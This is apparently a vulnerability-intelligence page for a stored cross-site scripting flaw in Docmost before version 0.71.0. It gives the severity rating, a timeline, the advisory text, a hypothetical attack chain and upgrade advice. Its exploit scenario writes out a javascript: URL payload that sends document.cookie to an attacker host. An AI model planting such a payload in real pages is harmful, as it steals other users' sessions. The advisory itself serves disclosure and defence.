Skip to main content

Docmost EUVD-2026-22754

| CVE-2026-34212 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-04-14 security-advisories@github.com
XSS Docmost
5.4
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.4 MEDIUM
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

6
Patch released
Apr 22, 2026 - 18:47 nvd
Patch available
Patch available
Apr 16, 2026 - 05:29 EUVD
0.71.0
Analysis Generated
Apr 14, 2026 - 22:43 vuln.today
EUVD ID Assigned
Apr 14, 2026 - 22:22 euvd
EUVD-2026-22754
Analysis Generated
Apr 14, 2026 - 22:22 vuln.today
CVE Published
Apr 14, 2026 - 22:16 nvd
MEDIUM 5.4

DescriptionGitHub Advisory

Docmost is open-source collaborative wiki and documentation software. In versions prior to 0.71.0, improper neutralization of attachment URLs in Docmost allows a low-privileged authenticated user to store a malicious javascript: URL inside an attachment node in page content. When another user views the page and activates the attachment link/icon, attacker-controlled JavaScript executes in the context of the Docmost origin. Version 0.71.0 patches the issue.

AnalysisAI

Stored cross-site scripting (XSS) in Docmost prior to version 0.71.0 allows authenticated users to inject malicious javascript: URLs into attachment nodes, executing arbitrary JavaScript in the browser context of other users who activate those attachments. Attack requires low privileges and user interaction (clicking the attachment), affecting all users viewing compromised pages. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Authenticate as low-privilege user
Delivery
Craft malicious attachment node with javascript: URL
Exploit
Store payload in page content
Execution
Victim views page and clicks attachment
Persist
JavaScript executes in victim's browser context
Impact
Session/credential theft or defacement
Sign in to reveal

Vulnerability AssessmentAI

Risk Assessment CVSS 5.4 (Medium) with network vector, low attack complexity, and low privilege requirement reflects realistic attainability. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A low-privileged user in a shared Docmost workspace creates a seemingly legitimate document and embeds an attachment node with a `javascript:` URL (e.g., `javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)`). When a colleague clicks the attachment icon to open it, the injected JavaScript executes in their browser under the Docmost origin, potentially exfiltrating session cookies, CSRF tokens, or sensitive page content. …
Remediation Upgrade Docmost to version 0.71.0 or later, which patches the URL neutralization flaw. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-22754 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy